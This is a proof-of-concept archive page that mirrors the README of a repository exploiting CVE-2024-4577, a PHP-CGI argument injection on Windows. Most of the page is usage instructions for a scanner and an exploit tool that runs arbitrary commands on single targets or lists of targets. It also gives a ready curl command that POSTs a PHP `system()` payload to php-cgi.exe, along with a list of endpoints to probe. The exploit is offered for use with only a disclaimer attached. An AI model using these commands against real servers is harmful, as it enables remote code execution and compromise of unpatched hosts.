Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-4577 PoC — Argument Injection in PHP-CGI

Source
https://github.com/r0otk3r/CVE-2024-4577
Associated Vulnerability
Title:Argument Injection in PHP-CGI (CVE-2024-4577)
Description:In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Readme
# CVE-2024-4577 - PHP CGI Argument Injection RCE

## Summary

CVE-2024-4577 is a critical **PHP CGI argument injection vulnerability** that affects Windows systems running PHP in CGI mode. This flaw allows remote attackers to **inject arguments** into PHP's command line via specially crafted URLs, leading to **remote code execution (RCE)**.

This repository includes:

- `CVE-2024-4577.py`: A **scanner** to detect vulnerable targets.
- `exploit.py`: An **exploit tool** that sends PHP code and executes system commands on the vulnerable server.

> ⚠️ **DISCLAIMER**  
> This project is for **educational and authorized testing** only. Any misuse of this code is not the responsibility of the author. Use responsibly and only in environments you own or have explicit permission to test.

---

## Requirements

- Python 3.x
- `requests` library

Install dependencies:

```bash
pip install -r requirements.txt
```
---

# Scanner Usage

Detect if a target is vulnerable to CVE-2024-4577:

## Single Target
```bash
python3 CVE-2024-4577.py -u http://target.com
```
![1](https://github.com/user-attachments/assets/2877a065-f568-4c9b-8b87-1bb220f1b904)

## Multiple Targets from File
```bash
python3 CVE-2024-4577.py -f urls.txt
```
![2](https://github.com/user-attachments/assets/45dbd725-4e57-4c3a-a33a-27a3ef3d6547)

## Custom Path (optional)
```bash
python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
```
### Example Vulnerable Paths
The scanner and exploit test common CGI endpoints like:
```bash
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
```
The payload bypasses cgi.force_redirect and prepends malicious PHP using php://input.

---
# Exploit Usage

Execute arbitrary system commands on a vulnerable target:

## Single Target
```bash
python3 exploit.py -u http://target.com -c "id"
```
![4](https://github.com/user-attachments/assets/027fe98c-4b0e-4729-8844-dddb460d3eb8)

## Multiple Targets from File
```bash
python3 exploit.py -f urls.txt -c "id"
```
![5](https://github.com/user-attachments/assets/01de96c5-09e8-4065-b162-484985834c01)
---
## Using curl

You can also exploit the vulnerability manually using curl
```bash
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
```
This sends a PHP payload that executes uname -a on the server and returns the output.

![3](https://github.com/user-attachments/assets/fd134d72-7849-481c-b1ce-45e63ba61187)
---

# License

This code is released under the MIT License. See LICENSE for more information.

---

## Official Channels

- [YouTube @rootctf](https://www.youtube.com/@rootctf)
- [X @r0otk3r](https://x.com/r0otk3r)
File Snapshot

 [4.0K]  /data/pocs/33066e9eb8b2977d0c2fdb473a7b409d1627da4d
├── [3.3K]  CVE-2024-4577.py
├── [2.9K]  exploit.py
├── [2.6K]  README.md
└── [  86]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →